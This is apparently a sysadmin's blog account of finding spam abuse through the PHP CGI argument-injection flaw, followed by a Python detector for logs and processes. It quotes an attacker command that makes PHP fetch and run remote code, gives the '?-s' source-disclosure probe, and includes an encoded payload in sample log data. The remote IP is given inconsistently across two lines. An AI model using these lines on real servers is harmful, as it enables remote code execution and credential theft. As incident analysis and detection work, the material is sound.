Find the hacker
I received a phone call towards noon today from a hosting provider in Florida who, after spending days trying to locate the source of spam coming from sites they host, needed expert help to track down the problem.
While they knew the domain names of sites they host involved in sending the spam, they were not able to see how this was happening.
The code on the sites looked clean. Anti-virus scans on the sites came back clean.
Sucuri Security scans of the site showed clean; and the web site was on zero black lists.
Yet, they had the actual spam emails with the email header pointing to the index.php of the sites in question.
Once I got access to the server, I was able to review the processes that were running.
What do I see?
php -dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://18.104.22.168/send.txt
In English: the attacker was using the site's PHP interpreter as an engine to fetch and run the code at http://22.214.171.124/send.txt, which was itself PHP code.
Quality assurance always matters, so I reviewed the web site access logs and found that each request using the above type of logic had worked.
As final confirmation, I browsed the site's home page with “?-s” appended, so the URL looked like http://domain_goes_here/index.php?-s
What I saw proved the point — rather than the home page, I saw the PHP source code, including the database login credentials, which would allow any hacker to really dive in and deface the site, steal data, etc.
What does it mean when “?-s” is appended to a PHP page and you see code?
It means the site, and most likely the entire server, is vulnerable to the PHP CGI vulnerability which came out in May 2012 (the vulnerability had existed for several years, but was only published in May).
In terms of a lesson to pass on, if you have one or more web sites you suspect are sending out spam or otherwise being abused by hackers but everything else looks clean, check if the site(s) involved are vulnerable to the PHP CGI attack vector.
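As an added example (my own code, not from the original post or the hosting provider's tooling), here is a small detector for the two evidence sources this post walks through: access-log requests whose query string would reach php-cgi as command-line arguments, and php processes launched with the -d overrides seen above. The log lines, IPs and host names are constructed placeholders, and the flagging rule assumes the CGI server only passes a query string to the interpreter as argv when it contains no literal "=".

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined format); placeholder hosts/IPs.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jul/2012:11:58:02 -0400] "GET /index.php?-s HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jul/2012:11:58:09 -0400] "POST /index.php?%2Dd+auto_prepend_file%3Dhttp%3A%2F%2Fexample.invalid%2Fsend.txt HTTP/1.1" 200 233 "-" "curl/7.21"
198.51.100.7 - - [10/Jul/2012:12:01:44 -0400] "GET /index.php?page=about HTTP/1.1" 200 8910 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jul/2012:12:03:10 -0400] "GET /index.php?id=-5 HTTP/1.1" 200 8910 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
# The php -d overrides seen in the abused process line on this page.
PHP_OPT_RE = re.compile(r'-d\s*(safe_mode|disable_functions|allow_url_fopen|'
                        r'allow_url_include|auto_prepend_file)\s*=', re.I)

def php_cgi_argument_injection(target):
    """Return the decoded query if this request target would reach php-cgi as
    command-line arguments, else None.  Assumption: the CGI server only passes
    the query as argv when it holds no literal '=', so '?-s' and an encoded
    '?-d+auto_prepend_file%3D...' qualify while a normal '?id=-5' does not."""
    if '?' not in target:
        return None
    raw_query = target.split('?', 1)[1]
    if '=' in raw_query:
        return None
    decoded = unquote_plus(raw_query)
    return decoded if decoded.startswith('-') else None

def scan_access_log(text):
    """Return one dict per request that carried php-cgi arguments, noting whether
    the server answered it with HTTP 200 (i.e. the attempt was served)."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = php_cgi_argument_injection(m['target'])
        if query is not None:
            hits.append({'ip': m['ip'], 'time': m['ts'], 'query': query,
                         'served': m['status'] == '200'})
    return hits

def suspicious_php_process(cmdline):
    """True for a php/php-cgi process started with the -d overrides abused in this
    incident (e.g. auto_prepend_file pointing at a remote URL)."""
    argv0 = cmdline.strip().split(' ', 1)[0]
    return argv0.endswith(('php', 'php-cgi')) and bool(PHP_OPT_RE.search(cmdline))
```

Run scan_access_log over the real access log and suspicious_php_process over each line of ps output; a served hit or a matching process is the signal the scanners in this story could not see.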
Do you have some tips to share for finding hacks and malware where everything else looks innocent?
Please share them in the comments.
P.S. Sucuri Security does a great job. Their scanner not reporting hacks or malware was 100% accurate. There were no hacks or malware on the site that was scanned; it was an issue of vulnerable code being abused. I did pass on a suggestion to the Sucuri team to check for the PHP CGI vulnerability as part of the excellent service.